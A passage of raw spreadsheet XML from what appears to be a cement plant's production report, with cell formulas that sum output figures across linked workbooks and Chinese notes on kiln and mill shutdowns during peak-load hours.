      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]12'!$T$19+'[14]12'!$T$20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G64+'11'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'11'!K64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G65+'11'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'11'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]12'!$Q$74</f>
        <v>1#窑:续停；2#窑:续停；1#磨:14:30-24:00库满停机。2#磨:8:00-22:05避峰停机。3#磨:8:00-23:20避峰停机。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G66+'11'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'11'!K66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G67+'11'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'11'!K67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'[15]12'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]12'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'11'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]12'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'11'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]12'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]12'!$Q$77</f>
        <v>1#磨14:30-22:15避峰停机:7.75小时(避峰)。2#磨8:45-22:15避峰停机:13.5小时(避峰)。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]12'!$D$43+'[15]12'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]12'!$E$43+'[15]12'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'11'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]12'!$H$43+'[15]12'!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'11'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]12'!$K$43+'[15]12'!$K$44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'[15]12'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]12'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'11'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]12'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'11'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]12'!$K$45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G71+'11'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'11'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]12'!$Q$80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G72+'11'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'11'!K72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G73+'11'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'11'!K73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G74+'11'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'11'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]12'!$Q$83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G75+'11'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'11'!K75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G76+'11'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'11'!K76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G77+'11'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'11'!K77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G78+'11'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'11'!K78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'[16]12'!$E$7</f>
        <v>644.68</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'11'!H79</f>
        <v>6572.88</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>153701.35</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]12'!$I$7</f>
        <v>541</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'11'!K79</f>
        <v>6247.5</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>148138.95</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]12'!$L$7</f>
        <v>5210.16</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>10.42032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'[16]12'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'11'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]12'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'11'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]12'!$Y$15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G81+'11'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'11'!K81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G82+'11'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'11'!K82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G83+'11'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'11'!K83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G84+'11'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'11'!K84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G85+'11'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'11'!K85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Z158"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="4" ySplit="4" topLeftCell="E20"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13/31</f>
        <v>0.419354838709677</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>46004</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22621.96</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'12'!H5</f>
        <v>276851.65</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6431717.68</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>21603.811</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'12'!K5</f>
        <v>296339.44</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6446410.571</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>247980.034</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>66.3048219251336</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]13'!$W$101</f>
        <v>0</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]13'!$X$101</f>
        <v>271.294167565063</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]13'!$Y$101</f>
        <v>260.421411059556</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]13'!$T$101</f>
        <v>0</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]13'!$U$101</f>
        <v>74.0278846153846</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]13'!$V$101</f>
        <v>65.0130403458213</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]13'!$Q$101</f>
        <v>0</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]13'!$R$101</f>
        <v>230.967</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]13'!$S$101</f>
        <v>5414.286</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>'[10]13'!$D$23+'[11]13'!$D$17+'[12]13'!$D$17+'[13]13'!$D$25+'[14]13'!$D$8+'[14]13'!$D$15+'[15]13'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]13'!$E$23+'[11]13'!$E$17+'[12]13'!$E$17+'[13]13'!$E$25+'[14]13'!$E$8+'[14]13'!$E$15+'[15]13'!$E$7</f>
        <v>2245</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'12'!H6</f>
        <v>5428</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>281777.96</v>
      </c>
      <c r="J6" s="194">
        <f>'[10]13'!$I$23+'[11]13'!$I$17+'[12]13'!$I$17+'[13]13'!$I$25+'[14]13'!$E$23+'[14]13'!$E$30+'[15]13'!$H$7</f>
        <v>841.6</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'12'!K6</f>
        <v>9262.47</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>271460.17</v>
      </c>
      <c r="M6" s="194">
        <f>'[10]13'!$L$23+'[11]13'!$L$17+'[12]13'!$L$17+'[13]13'!$L$25+'[14]13'!$H$23+'[14]13'!$H$30+'[15]13'!$K$7</f>
        <v>28278.37</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>'[10]13'!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>'[10]13'!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>'[10]13'!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>'[10]13'!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>'[10]13'!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>'[10]13'!$V$102</f>
        <v>34.1642531219981</v>
      </c>
      <c r="X6" s="198">
        <f>'[10]13'!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>'[10]13'!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>'[10]13'!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>'[12]13'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>'[12]13'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'12'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>'[12]13'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'12'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>'[12]13'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>'[10]13'!$W$107</f>
        <v>123.837700760778</v>
      </c>
      <c r="S7" s="202">
        <f>'[10]13'!$X$107</f>
        <v>126.280332714649</v>
      </c>
      <c r="T7" s="198">
        <f>'[10]13'!$Y$107</f>
        <v>131.618837660117</v>
      </c>
      <c r="U7" s="198">
        <f>'[10]13'!$T$107</f>
        <v>49.2916666666667</v>
      </c>
      <c r="V7" s="198">
        <f>'[10]13'!$U$107</f>
        <v>46.625</v>
      </c>
      <c r="W7" s="198">
        <f>'[10]13'!$V$107</f>
        <v>31.591018251681</v>
      </c>
      <c r="X7" s="198">
        <f>'[10]13'!$Q$107</f>
        <v>11.83</v>
      </c>
      <c r="Y7" s="198">
        <f>'[10]13'!$R$107</f>
        <v>145.47</v>
      </c>
      <c r="Z7" s="198">
        <f>'[10]13'!$S$107</f>
        <v>2630.9</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>'[10]13'!$D$27+'[11]13'!$D$18+'[13]13'!$D$26+'[14]13'!$D$10+'[14]13'!$D$17+'[15]13'!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>'[10]13'!$E$27+'[11]13'!$E$18+'[13]13'!$E$26+'[14]13'!$E$10+'[14]13'!$E$17+'[15]13'!$E$9</f>
        <v>3862</v>
      </c>
      <c r="H8" s="194">
        <f>G8+'12'!H8</f>
        <v>27231</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>552767.99</v>
      </c>
      <c r="J8" s="194">
        <f>'[10]13'!$I$27+'[11]13'!$I$18+'[13]13'!$I$26+'[14]13'!$E$25+'[14]13'!$E$32+'[15]13'!$H$9</f>
        <v>2320.16</v>
      </c>
      <c r="K8" s="194">
        <f>J8+'12'!K8</f>
        <v>32679.67</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>540424.38</v>
      </c>
      <c r="M8" s="194">
        <f>'[10]13'!$L$27+'[11]13'!$L$18+'[13]13'!$L$26+'[14]13'!$H$25+'[14]13'!$H$32+'[15]13'!$K$9</f>
        <v>36431.23</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>'[10]13'!$W$108</f>
        <v>130.008453085376</v>
      </c>
      <c r="S8" s="198">
        <f>'[10]13'!$X$108</f>
        <v>131.438577586207</v>
      </c>
      <c r="T8" s="198">
        <f>'[10]13'!$Y$108</f>
        <v>127.678407729403</v>
      </c>
      <c r="U8" s="198">
        <f>'[10]13'!$T$108</f>
        <v>49.2916666666667</v>
      </c>
      <c r="V8" s="198">
        <f>'[10]13'!$U$108</f>
        <v>47.5897435897436</v>
      </c>
      <c r="W8" s="198">
        <f>'[10]13'!$V$108</f>
        <v>28.1619836695485</v>
      </c>
      <c r="X8" s="198">
        <f>'[10]13'!$Q$108</f>
        <v>11.83</v>
      </c>
      <c r="Y8" s="198">
        <f>'[10]13'!$R$108</f>
        <v>148.48</v>
      </c>
      <c r="Z8" s="198">
        <f>'[10]13'!$S$108</f>
        <v>2345.33</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>'[10]13'!$D$24+'[11]13'!$D$19+'[12]13'!$D$20+'[13]13'!$D$27+'[14]13'!$D$11+'[14]13'!$D$18+'[15]13'!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
        <f>'[10]13'!$E$24+'[11]13'!$E$19++'[12]13'!$E$20+'[13]13'!$E$27+'[14]13'!$E$11+'[14]13'!$E$18+'[15]13'!$E$10</f>
        <v>15180</v>
      </c>
      <c r="H9" s="194">
        <f>G9+'12'!H9</f>
        <v>201955</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4337343.88</v>
      </c>
      <c r="J9" s="194">
        <f>'[10]13'!$I$24+'[11]13'!$I$19+'[12]13'!$I$20+'[13]13'!$I$27+'[14]13'!$E$26+'[14]13'!$E$33+'[15]13'!$H$10</f>
        <v>14661.731</v>
      </c>
      <c r="K9" s="194">
        <f>J9+'12'!K9</f>
        <v>199328.83</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4296807.641</v>
      </c>
      <c r="M9" s="194">
        <f>'[10]13'!$L$24+'[11]13'!$L$19+'[12]13'!$L$20+'[13]13'!$L$27+'[14]13'!$H$26+'[14]13'!$H$33+'[15]13'!$K$10</f>
        <v>113491.882</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>'[10]13'!$W$109</f>
        <v>0</v>
      </c>
      <c r="S9" s="198">
        <f>'[10]13'!$X$109</f>
        <v>272.595281306715</v>
      </c>
      <c r="T9" s="198">
        <f>'[10]13'!$Y$109</f>
        <v>271.352232336368</v>
      </c>
      <c r="U9" s="198">
        <f>'[10]13'!$T$109</f>
        <v>0</v>
      </c>
      <c r="V9" s="198">
        <f>'[10]13'!$U$109</f>
        <v>28.2564102564103</v>
      </c>
      <c r="W9" s="198">
        <f>'[10]13'!$V$109</f>
        <v>34.6271613832852</v>
      </c>
      <c r="X9" s="198">
        <f>'[10]13'!$Q$109</f>
        <v>0</v>
      </c>
      <c r="Y9" s="198">
        <f>'[10]13'!$R$109</f>
        <v>88.16</v>
      </c>
      <c r="Z9" s="198">
        <f>'[10]13'!$S$109</f>
        <v>2883.74999999999</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>'[10]13'!$D$25+'[11]13'!$D$20+'[12]13'!$D$21+'[13]13'!$D$28+'[14]13'!$D$12+'[14]13'!$D$19+'[15]13'!$D$11</f>
        <v>61206.942</v>
      </c>
      <c r="G10" s="194">
        <f>'[10]13'!$E$25+'[11]13'!$E$20+'[12]13'!$E$21+'[13]13'!$E$28+'[14]13'!$E$12+'[14]13'!$E$19+'[15]13'!$E$11</f>
        <v>943</v>
      </c>
      <c r="H10" s="194">
        <f>G10+'12'!H10</f>
        <v>26573</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>944100.17</v>
      </c>
      <c r="J10" s="194">
        <f>'[10]13'!$I$25+'[11]13'!$I$20+'[12]13'!$I$21+'[13]13'!$I$28+'[14]13'!$E$27+'[14]13'!$E$34+'[15]13'!$H$11</f>
        <v>2814.16</v>
      </c>
      <c r="K10" s="194">
        <f>J10+'12'!K10</f>
        <v>37549.56</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>934778.28</v>
      </c>
      <c r="M10" s="194">
        <f>'[10]13'!$L$25+'[11]13'!$L$20+'[12]13'!$L$21+'[13]13'!$L$28+'[14]13'!$H$27+'[14]13'!$H$34+'[15]13'!$K$11</f>
        <v>50230.382</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198">
        <f>'[10]13'!$W$110</f>
        <v>253.269024651661</v>
      </c>
      <c r="S10" s="198">
        <f>'[10]13'!$X$110</f>
        <v>255.53206483439</v>
      </c>
      <c r="T10" s="198">
        <f>'[10]13'!$Y$110</f>
        <v>268.388867740685</v>
      </c>
      <c r="U10" s="198">
        <f>'[10]13'!$T$110</f>
        <v>38.875</v>
      </c>
      <c r="V10" s="198">
        <f>'[10]13'!$U$110</f>
        <v>31.8365384615385</v>
      </c>
      <c r="W10" s="198">
        <f>'[10]13'!$V$110</f>
        <v>34.3826849183477</v>
      </c>
      <c r="X10" s="198">
        <f>'[10]13'!$Q$110</f>
        <v>9.33</v>
      </c>
      <c r="Y10" s="198">
        <f>'[10]13'!$R$110</f>
        <v>99.33</v>
      </c>
      <c r="Z10" s="198">
        <f>'[10]13'!$S$110</f>
        <v>2863.39</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>'[10]13'!$D$26+'[11]13'!$D$21+'[12]13'!$D$19+'[13]13'!$D$29+'[14]13'!$D$13+'[14]13'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G11" s="194">
        <f>'[10]13'!$E$26+'[11]13'!$E$21+'[12]13'!$E$19+'[13]13'!$E$29+'[14]13'!$E$13+'[14]13'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+'12'!H11</f>
        <v>153.81</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>153.81</v>
      </c>
      <c r="J11" s="194">
        <f>'[10]13'!$I$26+'[11]13'!$I$21+'[12]13'!$I$19+'[13]13'!$I$29+'[14]13'!$E$28+'[14]13'!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+'12'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>'[10]13'!$L$26+'[11]13'!$L$21+'[12]13'!$L$19+'[13]13'!$L$29+'[14]13'!$H$28+'[14]13'!$H$35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6023.00000000002</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'12'!H12</f>
        <v>122238</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>5064629.25</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J69</f>
        <v>16942.71</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'12'!K12</f>
        <v>230737.938</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5259844.314</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>295158.02700005</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>67.2341747152734</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>'[16]13'!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>'[16]13'!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>'[16]13'!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>'[16]13'!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
        <f>'[16]13'!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>'[16]13'!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>'[16]13'!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>'[16]13'!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>'[16]13'!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f>F23+F33+F43+F53+F63+F70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G70</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'12'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+'12'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>54.1574361467982</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>'[11]13'!$W$68</f>
        <v>250.958333333333</v>
      </c>
      <c r="S13" s="209">
        <f>'[11]13'!$X$68</f>
        <v>263.619469026549</v>
      </c>
      <c r="T13" s="209">
        <f>'[11]13'!$Y$68</f>
        <v>266.277448909928</v>
      </c>
      <c r="U13" s="209">
        <f>'[11]13'!$T$68</f>
        <v>100</v>
      </c>
      <c r="V13" s="209">
        <f>'[11]13'!$U$68</f>
        <v>72.4358974358974</v>
      </c>
      <c r="W13" s="209">
        <f>'[11]13'!$V$68</f>
        <v>71.5841738712776</v>
      </c>
      <c r="X13" s="210" t="str">
        <f>'[11]13'!$Q$68</f>
        <v>24.00</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>'[11]13'!$R$68</f>
        <v>226.00</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>'[11]13'!$S$68</f>
        <v>5961.53</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
